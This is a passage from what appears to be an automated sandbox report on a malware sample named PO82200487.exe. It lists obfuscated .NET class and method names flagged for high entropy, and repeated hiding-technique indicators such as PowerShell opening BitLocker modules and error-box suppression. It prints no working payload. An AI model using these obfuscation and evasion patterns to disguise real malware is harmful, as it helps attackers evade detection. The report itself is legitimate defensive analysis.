                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, h0XUNd1IDDeKoUySk39.csHigh entropy of concatenated method names: 'ToString', 'yvEMTnbEdW', 'YsDMg1qhZy', 'l6EMtFaBqg', 'cDiMweKZdR', 'PlxMGb5Q3P', 'q8IMV6rXxm', 'M0CMPvLaKM', 'DqTZU21sfaEq0JW9IaA', 'MSwH9t18aBy78vdUkhW'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, UaZJgk5c46dCdoKWPT.csHigh entropy of concatenated method names: 'yf9RSwV51w', 'fTIRlH16qy', 'XZbRe2b97U', 'OJpR9GTYeu', 'qVtRBaw54M', 'TUcRilbGrt', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, f9m3FINrLSWW8MQj5l.csHigh entropy of concatenated method names: 'zIMBy0ugjR', 'VYVBJ61Xbd', 'hYeBBcj9Wy', 'nrZBM7YaJr', 'uAXBrBcOON', 'UM8BscVbDt', 'Dispose', 'TYE6kKd4YI', 'urq6Y91EDb', 'nR66SCN5UY'
                  Source: 0.2.PO82200487.exe.9ac0000.3.raw.unpack, WIZg4G2lgXltoMSuKO.csHigh entropy of concatenated method names: 'RpyQTkfv7A', 'XQLQgFPxZq', 'S4IQwb9Gf4', 'TC6QGg6i5L', 'plRQPkuBY3', 'NkiQja7koB', 'C30QAgFKBu', 'Ov8QmE3Hki', 'ugiQuR1tXj', 'yBLQ4TCgbZ'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, LcJlpYHgsuedxhJLcL.csHigh entropy of concatenated method names: 'IysJKxc7bm', 'GNqJEtHrxH', 'ToString', 'nqLJkK6SsW', 'XDrJYXsQmR', 'NXUJSPa6yP', 'PykJlFT0Lx', 'rPeJeIfGRe', 'olrJ9K8I6L', 'sxsJipFZ5J'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, l1y3cbwLxvxoymGwTX.csHigh entropy of concatenated method names: 'kvhenfpAPt', 'xkxeYxMVsn', 'ULUelvMGtU', 'Vd1e9uYVAg', 'wAVeip0QhE', 'FAtlUG5qKt', 'eaEl34G5Ti', 'RhqlNpAcH4', 'JKjlDk7u8B', 'NNeloS8kuB'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, Mot5ucIb1v0EBSaoC4.csHigh entropy of concatenated method names: 'JPJ82XXSu', 'nOlcp6usP', 'zwh0DTQxW', 'pADbCX2IY', 'Hhxg8lZl8', 'AnStdblXP', 'px9U0rMS582hqpWuEQ', 'vmpMLv2GpGtrhTXGIL', 'eNV6Nfv39', 'Ek7RxTOMa'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, L1Mu1S31jbxL2VO3ty.csHigh entropy of concatenated method names: 'SuiJDsTtZJ', 'sHAJ5Nkipl', 'Csi6ZULiAl', 'msZ61E09ym', 'IPrJ41N4xv', 'SyDJOBPDkp', 'FpTJ24qqLS', 'mMZJpjVWHF', 'Tq7J7tCj7M', 'AqrJdNI7FU'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, PTgl33xswMxgXWTFCE.csHigh entropy of concatenated method names: 'hGS9XeyBL9', 'MhV9FaSnNi', 'JHm98peSu2', 'VTn9cL6Pml', 'O8m9WCWbnC', 'vYt90xNJp2', 'mZV9bS3Z8h', 'CAQ9T2Piwc', 'vtg9gmUD73', 'Ace9tDRNGC'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, ex5GLDYDPTZW9AOQkk.csHigh entropy of concatenated method names: 'Dispose', 'gWW1o8MQj5', 'vL5IGCDgUS', 'rCVwWeHCIO', 'iZu15tCcTC', 'MLX1zfITYX', 'ProcessDialogKey', 's3kIZ7rquq', 'nOmI1qLeaM', 'gi1IIUaZJg'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, I89XDPAG2y4SodpBGj.csHigh entropy of concatenated method names: 'pdg9kXKu1u', 'sZ29S4eXWL', 'ufj9eRV9Hf', 'NZae5WKuFE', 'zOvezYsfqN', 'PA79ZwMQnw', 'uCb911h5v5', 'qNY9IZ0dDN', 'omf9f1tHkV', 'vhB9LQ5oBa'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, x5iJJpLb7EC3FK5pqT.csHigh entropy of concatenated method names: 'peh199228R', 'zi71iXn9pJ', 'FMe1KBSd06', 'm1I1EXlF7n', 'jpm1yA4K1y', 'Vcb1CLxvxo', 'FeHKJ9iJZ9pGXELN0O', 'OXet4LOPeCbu4DwoIp', 'sWW11KEXgi', 'pOY1fBEvB8'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, lSSRSyzsnJwErZmQi8.csHigh entropy of concatenated method names: 'dHlR0RnC8e', 'tvtRTZiDT3', 'mXbRgMxX1D', 'X8TRwIAo0v', 'FWJRGhcfgd', 'RbMRPMw6SX', 'YWyRjh64NX', 'c2NRs4dwmw', 'PVFRXxpblY', 'yqsRFPGkcX'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, ODkjB9ppukJOQXQfdx.csHigh entropy of concatenated method names: 'dixyu1EKUU', 'S4dyOo2uuY', 'miwyp6d3Ne', 'jQBy7rFyMT', 'BblyGFVGP0', 'j4KyV4L4ds', 'IOYyPbkfQi', 'QyiyjIhd9C', 'YOHyqQFaXW', 'XfByA4rtqd'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, u9228RTFi7Xn9pJ5U5.csHigh entropy of concatenated method names: 'tSCYpwK4Bw', 'Cg3Y7h4lhU', 'mLUYdeE1MJ', 'teGYHXSdEs', 'G3FYUwTSdH', 'I5sY398yDR', 'aG0YNSv5qn', 'H8fYDvfVfa', 'SDtYoJKAVw', 'UpuY5yTktr'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, IRMb2PSPU11708aH29.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'tjhIobEZNx', 'MOyI5VpKXv', 'UgeIzhCmGJ', 'SSBfZGpQph', 'Jksf1t84oZ', 'TXJfI1WihA', 'cMPff07e6b', 'vFfGi5okKuZawqdC4df'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, f7rquqoQOmqLeaMYi1.csHigh entropy of concatenated method names: 'VycBwUHWaX', 'uGUBGqJev5', 'yfCBVjlPB1', 'bsWBPSBbdk', 'K9mBjCOdZ1', 'D8UBqwIhlj', 'xb1BALY93a', 'tWPBm8dBZp', 'jxEBxLaL7n', 'oLHBuAPDiV'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, yNWGmh11eGhmN0lpo9J.csHigh entropy of concatenated method names: 'shGR5jtxaD', 'y9qRzr5j07', 'fA7MZ8QCdc', 'zqGM1htKux', 'GGqMIQIUVF', 'TFpMfbc8wY', 'RMeMLHpefK', 'cdMMn8WSSS', 'UPhMkx3EGi', 'OGWMYDRENX'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, DHidhtgMeBSd06E1IX.csHigh entropy of concatenated method names: 'GhtSc3B4J2', 'x2LS0Q2m8q', 'FgjSTBYREB', 'rJtSgYFgj6', 'IB6Syqt49c', 'ieOSCZPv8I', 'wM4SJaIET3', 'oVqS6CAa2a', 'SyUSBHLnsZ', 'Xc0SRQc8lf'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, dDTjvl1LsKstwierwex.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SMYhBd446n', 'bWphRsdiQL', 'vJFhMZ9BV0', 'DOdhh4rZos', 'MsIhrUIn8r', 'qKBhacKJHv', 'C5PhsDaXBO'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, QLCIsDidBMb0vV5IRO.csHigh entropy of concatenated method names: 'yexfnYUJ1y', 'D3AfkFwl7v', 'IAdfYsghEI', 'xWpfSubo5V', 'BDjflyilbZ', 'tnHfekmZs2', 'UrVf947SiY', 'EMQfihitsr', 'enufvkmsvf', 'PTefKvCKFV'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, nbLgsh1ZVB0wtQ0N8io.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VLSR4hOW0Y', 'IAYROpSGgf', 'JShR2rP6uF', 'TXbRpjyjKN', 'rHqR7toaex', 'IZoRdAKQXv', 'SOiRHKhV4M'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, h0XUNd1IDDeKoUySk39.csHigh entropy of concatenated method names: 'ToString', 'yvEMTnbEdW', 'YsDMg1qhZy', 'l6EMtFaBqg', 'cDiMweKZdR', 'PlxMGb5Q3P', 'q8IMV6rXxm', 'M0CMPvLaKM', 'DqTZU21sfaEq0JW9IaA', 'MSwH9t18aBy78vdUkhW'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, UaZJgk5c46dCdoKWPT.csHigh entropy of concatenated method names: 'yf9RSwV51w', 'fTIRlH16qy', 'XZbRe2b97U', 'OJpR9GTYeu', 'qVtRBaw54M', 'TUcRilbGrt', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, f9m3FINrLSWW8MQj5l.csHigh entropy of concatenated method names: 'zIMBy0ugjR', 'VYVBJ61Xbd', 'hYeBBcj9Wy', 'nrZBM7YaJr', 'uAXBrBcOON', 'UM8BscVbDt', 'Dispose', 'TYE6kKd4YI', 'urq6Y91EDb', 'nR66SCN5UY'
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpack, WIZg4G2lgXltoMSuKO.csHigh entropy of concatenated method names: 'RpyQTkfv7A', 'XQLQgFPxZq', 'S4IQwb9Gf4', 'TC6QGg6i5L', 'plRQPkuBY3', 'NkiQja7koB', 'C30QAgFKBu', 'Ov8QmE3Hki', 'ugiQuR1tXj', 'yBLQ4TCgbZ'

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
